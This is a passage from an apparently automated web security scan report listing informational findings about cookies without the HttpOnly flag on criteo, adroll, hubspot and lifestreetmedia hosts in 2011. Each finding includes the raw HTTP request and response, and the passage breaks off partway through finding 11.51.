11.32. http://cpm.criteo.com/lp/img/uk_flag.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cpm.criteo.com
Path:	/lp/img/uk_flag.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

240plan=R915183294; path=/; expires=Wed, 18-May-2011 04:54:04 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lp/img/uk_flag.gif HTTP/1.1
Host: cpm.criteo.com
Proxy-Connection: keep-alive
Referer: http://cpm.criteo.com/lp/web_us.html?utm_source=US_InsideFB&utm_medium=display&utm_campaign=InsideFB_US&content=200x200
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 240plan=R915183294

Response

HTTP/1.1 200 OK
Set-Cookie: 240plan=R915183294; path=/; expires=Wed, 18-May-2011 04:54:04 GMT
Date: Sun, 15 May 2011 16:53:32 GMT
Server: Apache/2.2.X (OVH)
Last-Modified: Thu, 31 Mar 2011 12:18:02 GMT
ETag: "5613740-105-49fc648f04456"
Accept-Ranges: bytes
Content-Length: 261
Content-Type: image/gif

GIF89a........#SVo....y..anoTn.."..........OU............l......4B.u..QY9Jm......._g~....?.2?}DH..........\b!.......,...........`s.G.8..`X.` t..B......p1....!.....Lt......0:...."D ...r.F..4Z.f[.....!
...[SNIP]...

11.33. http://cpm.criteo.com/lp/img/us_flag.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cpm.criteo.com
Path:	/lp/img/us_flag.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

240plan=R915183294; path=/; expires=Wed, 18-May-2011 04:54:04 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lp/img/us_flag.gif HTTP/1.1
Host: cpm.criteo.com
Proxy-Connection: keep-alive
Referer: http://cpm.criteo.com/lp/web_us.html?utm_source=US_InsideFB&utm_medium=display&utm_campaign=InsideFB_US&content=200x200
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 240plan=R915183294

Response

HTTP/1.1 200 OK
Set-Cookie: 240plan=R915183294; path=/; expires=Wed, 18-May-2011 04:54:04 GMT
Date: Sun, 15 May 2011 16:53:32 GMT
Server: Apache/2.2.X (OVH)
Last-Modified: Thu, 31 Mar 2011 12:18:02 GMT
ETag: "5613742-e5-49fc648f1e0f9"
Accept-Ranges: bytes
Content-Length: 229
Content-Type: image/gif

GIF89a............lx...JWz....dd..~.......|z.vt6Elt^y....~z....trAJmJ].[f....;W.......[b..ml.rp....~...~LUs!.......,..........b.G ..8H.:.CP.45.w.xQ!.G...GW)...$c.P.*.h.. .d... }P;..8G.y ....6:".....
...[SNIP]...

11.34. http://cpm.criteo.com/lp/img/zappos_160600.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cpm.criteo.com
Path:	/lp/img/zappos_160600.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

240plan=R915183294; path=/; expires=Wed, 18-May-2011 04:54:04 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lp/img/zappos_160600.png HTTP/1.1
Host: cpm.criteo.com
Proxy-Connection: keep-alive
Referer: http://cpm.criteo.com/lp/web_us.html?utm_source=US_InsideFB&utm_medium=display&utm_campaign=InsideFB_US&content=200x200
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 240plan=R915183294

Response

HTTP/1.1 200 OK
Set-Cookie: 240plan=R915183294; path=/; expires=Wed, 18-May-2011 04:54:04 GMT
Date: Sun, 15 May 2011 16:53:37 GMT
Server: Apache/2.2.X (OVH)
Last-Modified: Thu, 31 Mar 2011 12:18:03 GMT
ETag: "35d45b9-526-49fc648f8642b"
Accept-Ranges: bytes
Content-Length: 1318
Content-Type: image/png

.PNG
.
...IHDR.......4.....H)......tEXtSoftware.Adobe ImageReadyq.e<...$PLTE...```.........u......................\.....IDATx... v. .@#.....w....)...3~ql..>.-......? ...n. .|..{........M.{......N..
...[SNIP]...

11.35. http://cpm.criteo.com/lp/scripts/jquery-1.4.2.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cpm.criteo.com
Path:	/lp/scripts/jquery-1.4.2.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

240plan=R915183294; path=/; expires=Wed, 18-May-2011 04:54:04 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lp/scripts/jquery-1.4.2.js HTTP/1.1
Host: cpm.criteo.com
Proxy-Connection: keep-alive
Referer: http://cpm.criteo.com/lp/web_us.html?utm_source=US_InsideFB&utm_medium=display&utm_campaign=InsideFB_US&content=200x200
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 240plan=R915183294

Response

HTTP/1.1 200 OK
Set-Cookie: 240plan=R915183294; path=/; expires=Wed, 18-May-2011 04:54:04 GMT
Date: Sun, 15 May 2011 16:53:29 GMT
Server: Apache/2.2.X (OVH)
Last-Modified: Thu, 31 Mar 2011 12:18:04 GMT
ETag: "561375d-2800f-49fc64902064b"
Accept-Ranges: bytes
Content-Length: 163855
Content-Type: application/javascript

/*!
* jQuery JavaScript Library v1.4.2
* http://jquery.com/
*
* Copyright 2010, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Includes Siz
...[SNIP]...

11.36. http://cpm.criteo.com/lp/scripts/jquery.innerfade.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cpm.criteo.com
Path:	/lp/scripts/jquery.innerfade.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

240plan=R915183294; path=/; expires=Wed, 18-May-2011 04:54:04 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lp/scripts/jquery.innerfade.js HTTP/1.1
Host: cpm.criteo.com
Proxy-Connection: keep-alive
Referer: http://cpm.criteo.com/lp/web_us.html?utm_source=US_InsideFB&utm_medium=display&utm_campaign=InsideFB_US&content=200x200
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 240plan=R915183294

Response

HTTP/1.1 200 OK
Set-Cookie: 240plan=R915183294; path=/; expires=Wed, 18-May-2011 04:54:04 GMT
Date: Sun, 15 May 2011 16:53:29 GMT
Server: Apache/2.2.X (OVH)
Last-Modified: Thu, 31 Mar 2011 12:18:04 GMT
ETag: "5613760-133e-49fc64904682d"
Accept-Ranges: bytes
Content-Length: 4926
Content-Type: application/javascript

/* =========================================================

// jquery.innerfade.js

// Datum: 2008-02-14
// Firma: Medienfreunde Hofmann & Baldes GbR
// Author: Torsten Baldes
// Mail: t.baldes@medi
...[SNIP]...

11.37. http://cpm.criteo.com/lp/web_us.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cpm.criteo.com
Path:	/lp/web_us.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

240plan=R3476728249; path=/; expires=Wed, 18-May-2011 04:54:04 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lp/web_us.html?utm_source=US_InsideFB&utm_medium=display&utm_campaign=InsideFB_US&content=200x200 HTTP/1.1
Host: cpm.criteo.com
Proxy-Connection: keep-alive
Referer: http://www.insidefacebook.com/adtracker2/ads.php?a=108&c=1&s=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: 240plan=R3476728249; path=/; expires=Wed, 18-May-2011 04:54:04 GMT
Date: Sun, 15 May 2011 16:53:27 GMT
Server: Apache/2.2.X (OVH)
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 6202

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...

11.38. http://d.adroll.com/pixel/SNWCKNCH3JFBBA3BHHHZOL/YNYIFZAM3NACFPVLCC56LA previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d.adroll.com
Path:	/pixel/SNWCKNCH3JFBBA3BHHHZOL/YNYIFZAM3NACFPVLCC56LA

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

__adroll=126f5428d954fddf761ebc8b57be198f; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel/SNWCKNCH3JFBBA3BHHHZOL/YNYIFZAM3NACFPVLCC56LA?pv=5913109914.399683&cookie=& HTTP/1.1
Host: d.adroll.com
Proxy-Connection: keep-alive
Referer: http://www.hubspot.com/ebooks/facebook-page-marketing-ebook-2011/?source=hspd-InsideFacebook-200x200ad-201104
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.7.67
Date: Sun, 15 May 2011 16:53:18 GMT
Connection: keep-alive
Set-Cookie: __adroll=126f5428d954fddf761ebc8b57be198f; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/
Pragma: no-cache
P3P: CP='NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV'
Location: http://a.adroll.com/pixel/SNWCKNCH3JFBBA3BHHHZOL/YNYIFZAM3NACFPVLCC56LA/YBTCZKMLVJGNJKSIKUO3HL.js
Content-Length: 0
Cache-Control: no-store, no-cache, must-revalidate

11.39. http://dis.us.criteo.com/dis/dis.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dis.us.criteo.com
Path:	/dis/dis.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

uid=acd30cad-abc2-4421-b93d-473e478e8829; domain=.criteo.com; expires=Sun, 15-May-2016 16:56:14 GMT; path=/
udc=*185VYQmJaGc9Pbb0uixlNCg%3d%3d; domain=.criteo.com; expires=Tue, 15-Nov-2011 17:56:14 GMT; path=/
udi=*1VxJSydjTnc75s1tKJAp%2bvQ%3d%3d; domain=.criteo.com; expires=Mon, 16-May-2011 16:56:14 GMT; path=/
uic=*1MwVR6KMcAzACV3ax%2byDyPJ2xMtUJk7IIuuHiM4PLkmtoXghSJ%2fYPYDai6VYM0en%2b; domain=.criteo.com; expires=Tue, 15-Nov-2011 17:56:14 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.40. http://hubspot.app1.hubspot.com/salog.js.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hubspot.app1.hubspot.com
Path:	/salog.js.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

HUBSPOT131=420549804.0.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /salog.js.aspx HTTP/1.1
Host: hubspot.app1.hubspot.com
Proxy-Connection: keep-alive
Referer: http://www.hubspot.com/ebooks/facebook-page-marketing-ebook-2011/?source=hspd-InsideFacebook-200x200ad-201104
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Sun, 15 May 2011 16:53:12 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=CSFGDPIxzQEkAAAAOWZlMjUzYmQtNDk3Yy00ODFlLWIzNzQtZGE4NTUzZTEzOGY30; expires=Mon, 14-May-2012 16:53:12 GMT; path=/; HttpOnly
Set-Cookie: hubspotutk=a3ef224d-b643-4804-a3e2-4ca05d84f49f; domain=hubspot.app1.hubspot.com; expires=Sat, 15-May-2021 05:00:00 GMT; path=/; HttpOnly
Vary: Accept-Encoding
Set-Cookie: HUBSPOT131=420549804.0.0000; path=/
Content-Length: 497

var hsUse20Servers = true;
var hsDayEndsIn = 40007;
var hsWeekEndsIn = 40007;
var hsMonthEndsIn = 1422407;
var hsAnalyticsServer = "tracking.hubspot.com";
var hsTimeStamp = "2011-05-15 12:53:
...[SNIP]...

11.41. http://hubspot.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hubspot.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

HUBSPOT130=68228268.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: hubspot.com
Proxy-Connection: keep-alive
Referer: http://www.hubspot.com/ebooks/facebook-page-marketing-ebook-2011/?source=hspd-InsideFacebook-200x200ad-201104
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sun, 15 May 2011 16:54:25 GMT
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.hubspot.com/
Cache-Control: private
Content-Length: 0
Set-Cookie: HUBSPOT130=68228268.20480.0000; path=/

11.42. http://my.lifestreetmedia.com/login/register/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://my.lifestreetmedia.com
Path:	/login/register/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

cs=ip633-FAJUmbOgH7WNCK7VMGS02w; path=/; domain=.my.lifestreetmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.43. http://publishers.criteo.com/signup.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://publishers.criteo.com
Path:	/signup.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CulturePreference=en-US; expires=Fri, 15-May-2111 16:55:15 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.44. http://track.lfstmedia.com/cmp698 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://track.lfstmedia.com
Path:	/cmp698

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

trx=ip3281-j1hk7ww8VzbRyoeL2te32g; Domain=.lfstmedia.com; Expires=Mon, 14-May-2012 16:53:18 GMT; Path=/
trs=ip3281-Pe89Bj0rDzZtYp1B2t1CwP; Domain=.lfstmedia.com; Path=/
adu=kFfviwdBGAG2fdQv1i6avvzeHSzTq9cE; Domain=.lfstmedia.com; Expires=Wed, 12-May-2021 16:53:18 GMT; Path=/
cs=ip731-EeyQdI8ersgihSDXNkHEDA; path=/; domain=.lfstmedia.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.45. http://www.criteo.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.criteo.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

240plan=R3498005976; path=/; expires=Wed, 18-May-2011 05:10:09 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.criteo.com
Proxy-Connection: keep-alive
Referer: http://publishers.criteo.com/signup.aspx?lang=en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94712387.1305478412.1.1.utmcsr=US_InsideFB|utmccn=InsideFB_US|utmcmd=display; __utma=94712387.631168667.1305478412.1305478412.1305478412.1; __utmc=94712387; __utmb=94712387.3.10.1305478412

Response

HTTP/1.1 200 OK
Set-Cookie: 240plan=R3498005976; path=/; expires=Wed, 18-May-2011 05:10:09 GMT
Date: Sun, 15 May 2011 16:55:52 GMT
Server: Apache/2.2.X (OVH)
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 133

<html>
   <head>
       <title>Criteo</title>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.criteo.com/index.php">
   </head>
</html>

11.46. http://www.criteo.com/components/com_joomfish/images/flags/au.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.criteo.com
Path:	/components/com_joomfish/images/flags/au.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:09 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /components/com_joomfish/images/flags/au.gif HTTP/1.1
Host: www.criteo.com
Proxy-Connection: keep-alive
Referer: http://www.criteo.com/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94712387.1305478412.1.1.utmcsr=US_InsideFB|utmccn=InsideFB_US|utmcmd=display; 0ecea38193df0c9bab184bf1b140820e=3c4941b52ae17188bef1bb9b7eb39f0c; jfcookie[lang]=us; 240plan=R1146701318; __utma=94712387.631168667.1305478412.1305478412.1305478412.1; __utmc=94712387; __utmb=94712387.4.10.1305478412

Response

HTTP/1.1 200 OK
Set-Cookie: 240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:09 GMT
Date: Sun, 15 May 2011 16:55:40 GMT
Server: Apache/2.2.X (OVH)
Last-Modified: Fri, 29 Apr 2011 17:13:29 GMT
Accept-Ranges: bytes
Content-Length: 952
Content-Type: image/gif

......JFIF.....`.`.....C.................................... . ..
...

...... ...........C............................................................................"..............................
...[SNIP]...

11.47. http://www.criteo.com/components/com_joomfish/images/flags/de.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.criteo.com
Path:	/components/com_joomfish/images/flags/de.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:10 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /components/com_joomfish/images/flags/de.gif HTTP/1.1
Host: www.criteo.com
Proxy-Connection: keep-alive
Referer: http://www.criteo.com/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94712387.1305478412.1.1.utmcsr=US_InsideFB|utmccn=InsideFB_US|utmcmd=display; 0ecea38193df0c9bab184bf1b140820e=3c4941b52ae17188bef1bb9b7eb39f0c; jfcookie[lang]=us; 240plan=R1146701318; __utma=94712387.631168667.1305478412.1305478412.1305478412.1; __utmc=94712387; __utmb=94712387.4.10.1305478412

Response

HTTP/1.1 200 OK
Set-Cookie: 240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:10 GMT
Date: Sun, 15 May 2011 16:55:38 GMT
Server: Apache/2.2.X (OVH)
Last-Modified: Tue, 04 May 2010 01:37:16 GMT
Accept-Ranges: bytes
Content-Length: 563
Content-Type: image/gif

GIF89a.....@.....).......WB%%%.".. ....F=<..#. .......zzz...=?@........!..............1............***SSS.....k..Q................&.XXX....YB.....).UA^^^........ .".UUU..RTTT)))....!..%......!......
...[SNIP]...

11.48. http://www.criteo.com/components/com_joomfish/images/flags/en.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.criteo.com
Path:	/components/com_joomfish/images/flags/en.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:09 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /components/com_joomfish/images/flags/en.gif HTTP/1.1
Host: www.criteo.com
Proxy-Connection: keep-alive
Referer: http://www.criteo.com/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94712387.1305478412.1.1.utmcsr=US_InsideFB|utmccn=InsideFB_US|utmcmd=display; 0ecea38193df0c9bab184bf1b140820e=3c4941b52ae17188bef1bb9b7eb39f0c; jfcookie[lang]=us; 240plan=R1146701318; __utma=94712387.631168667.1305478412.1305478412.1305478412.1; __utmc=94712387; __utmb=94712387.4.10.1305478412

Response

HTTP/1.1 200 OK
Set-Cookie: 240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:09 GMT
Date: Sun, 15 May 2011 16:55:35 GMT
Server: Apache/2.2.X (OVH)
Last-Modified: Tue, 04 May 2010 01:37:16 GMT
Accept-Ranges: bytes
Content-Length: 641
Content-Type: image/gif

GIF89a.....@..a[.........^c..d\]Un.".....;2......<Ew.or.3^..
.r..ql1=p....WS...3,............LU.......v........
.S..~.............TM...8M.... .e.NM...js..{.......mcx..............u.rk...{}.. ..!W.. .
...[SNIP]...

11.49. http://www.criteo.com/components/com_joomfish/images/flags/es.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.criteo.com
Path:	/components/com_joomfish/images/flags/es.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:10 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /components/com_joomfish/images/flags/es.gif HTTP/1.1
Host: www.criteo.com
Proxy-Connection: keep-alive
Referer: http://www.criteo.com/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94712387.1305478412.1.1.utmcsr=US_InsideFB|utmccn=InsideFB_US|utmcmd=display; 0ecea38193df0c9bab184bf1b140820e=3c4941b52ae17188bef1bb9b7eb39f0c; jfcookie[lang]=us; 240plan=R1146701318; __utma=94712387.631168667.1305478412.1305478412.1305478412.1; __utmc=94712387; __utmb=94712387.4.10.1305478412

Response

HTTP/1.1 200 OK
Set-Cookie: 240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:10 GMT
Date: Sun, 15 May 2011 16:55:38 GMT
Server: Apache/2.2.X (OVH)
Last-Modified: Tue, 04 May 2010 01:37:17 GMT
Accept-Ranges: bytes
Content-Length: 587
Content-Type: image/gif

GIF89a.....@.........2..........)...... ........v.F0........T.:9........8..=..
.....<..2..%.EO.JL..7.!..\_.p,.Q;...../.k......=..!.....<.............H1..!.."........9y95.``.......!........ ".......BB.
...[SNIP]...

11.50. http://www.criteo.com/components/com_joomfish/images/flags/fr.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.criteo.com
Path:	/components/com_joomfish/images/flags/fr.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:10 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /components/com_joomfish/images/flags/fr.gif HTTP/1.1
Host: www.criteo.com
Proxy-Connection: keep-alive
Referer: http://www.criteo.com/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94712387.1305478412.1.1.utmcsr=US_InsideFB|utmccn=InsideFB_US|utmcmd=display; 0ecea38193df0c9bab184bf1b140820e=3c4941b52ae17188bef1bb9b7eb39f0c; jfcookie[lang]=us; 240plan=R1146701318; __utma=94712387.631168667.1305478412.1305478412.1305478412.1; __utmc=94712387; __utmb=94712387.4.10.1305478412

Response

HTTP/1.1 200 OK
Set-Cookie: 240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:10 GMT
Date: Sun, 15 May 2011 16:55:38 GMT
Server: Apache/2.2.X (OVH)
Last-Modified: Tue, 04 May 2010 01:37:18 GMT
Accept-Ranges: bytes
Content-Length: 374
Content-Type: image/gif

GIF89a.....?.&R.#L..B..,..............>..UC;c........^M.pa.7.\}..8#Ci..WF.......K=...(Q..L9..........F.Wy..H4!G..n_..x`............ ...#E.....X.%R.1Z........\K....F2...!G.$P..:....+V....&Q...........
...[SNIP]...

11.51. http://www.criteo.com/components/com_joomfish/images/flags/it.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.criteo.com
Path:	/components/com_joomfish/images/flags/it.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:10 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /components/com_joomfish/images/flags/it.gif HTTP/1.1
Host: www.criteo.com
Proxy-Connection: keep-alive
Referer: http://www.criteo.com/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94712387.1305478412.1.1.utmcsr=US_InsideFB|utmccn=InsideFB_US|utmcmd=display; 0ecea38193df0c9bab184bf1b140820e=3c4941b52ae17188bef1bb9b7eb39f0c; jfcookie[lang]=us; 240plan=R1146701318; __utma=94712387.631168667.1305478412.1305478412.1305478412.1; __utmc=94712387; __utmb=94712387.4.10.1305478412

Response

HTTP/1.1 200 OK
